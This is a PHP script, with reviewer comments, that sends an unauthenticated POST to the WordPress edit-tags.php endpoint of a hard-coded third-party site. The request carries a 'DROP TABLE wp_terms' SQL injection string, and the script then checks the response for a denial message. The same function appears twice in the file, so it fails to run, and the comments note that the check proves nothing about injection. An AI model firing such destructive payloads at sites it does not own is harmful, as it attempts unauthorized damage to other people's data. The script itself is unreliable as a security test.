SQL injection test: edit-tags.php (WordPress)
<?php
// Sends a single unauthenticated POST to the wp-admin edit-tags.php endpoint
// with a SQL-looking string in the 'tag-name' form field and reports whether
// the response body contains WordPress's "not allowed to create terms" message.
// Returns one of two string labels; it never throws.
//
// NOTE(review): as written this does not demonstrate (or rule out) SQL
// injection. No session cookie or credentials are attached, and the only thing
// inspected is one capability-denial message, so the result reflects the
// endpoint's authorization handling, not how the value reaches the database.
// Term creation in WordPress presumably goes through $wpdb with escaping, so
// the payload would be stored as a literal string — verify against the
// application's source rather than this response check. Both return labels are
// typos and do not say which outcome is the "good" one.
function test_sql_injection() {
$url = 'http://adroom.ir/wp-admin/edit-tags.php'; // hard-coded target, plain http
$post_data = array(
'tag-name' => "test_tag'; DROP TABLE wp_terms; --", // sent verbatim as a form value
'taxonomy' => 'post_tag',
'submit' => 'Add Tag',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); // form-encoded body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of echoing it
// CURLOPT_FOLLOWLOCATION is not set, so a redirect response (e.g. to the login
// page — presumably what an unauthenticated wp-admin request receives, confirm)
// is returned as-is and will not contain the message checked below.
$response = curl_exec($ch); // false on transport failure — never checked
curl_close($ch);
// If curl_exec() returned false, strpos() coerces it to '' (no strict_types
// declared) and returns false, so a failed request is indistinguishable from a
// successful request whose body lacks the message.
if (strpos($response, 'Sorry, you are not allowed to create terms in this taxonomy.') !== false) {
return 'ops NO OK'; // capability check rejected the request
} else {
return 'opsNOTOKKK'; // message absent: request failed, was redirected, or was accepted
}
}
echo test_sql_injection(); // the script's only output: one of the two labels above
?>
<?php
// NOTE(review): this is a byte-for-byte duplicate of test_sql_injection()
// declared earlier in the same file. PHP rejects a second declaration of the
// same function name at compile time ("Cannot redeclare function"), so the
// file fails before either copy runs. One of the two copies should be removed.
//
// Behaviour of the copy: one unauthenticated POST to edit-tags.php with a
// SQL-looking 'tag-name' value; returns a label based solely on whether a
// capability-denial message appears in the response body. It does not check
// for database errors or whether a term was created, so it says nothing about
// SQL injection either way.
function test_sql_injection() {
$url = 'http://adroom.ir/wp-admin/edit-tags.php'; // hard-coded target, plain http
$post_data = array(
'tag-name' => "test_tag'; DROP TABLE wp_terms; --", // sent verbatim as a form value
'taxonomy' => 'post_tag',
'submit' => 'Add Tag',
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data)); // form-encoded body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // return the body instead of echoing it
$response = curl_exec($ch); // false on transport failure — never checked
curl_close($ch);
// strpos() on a false $response coerces it to '' (no strict_types declared),
// so a failed request takes the else branch like any body lacking the message.
if (strpos($response, 'Sorry, you are not allowed to create terms in this taxonomy.') !== false) {
return 'ops NO OK'; // capability check rejected the request
} else {
return 'opsNOTOKKK'; // message absent: request failed, was redirected, or was accepted
}
}
echo test_sql_injection(); // duplicate of the earlier echo; unreachable while the function is declared twice
?>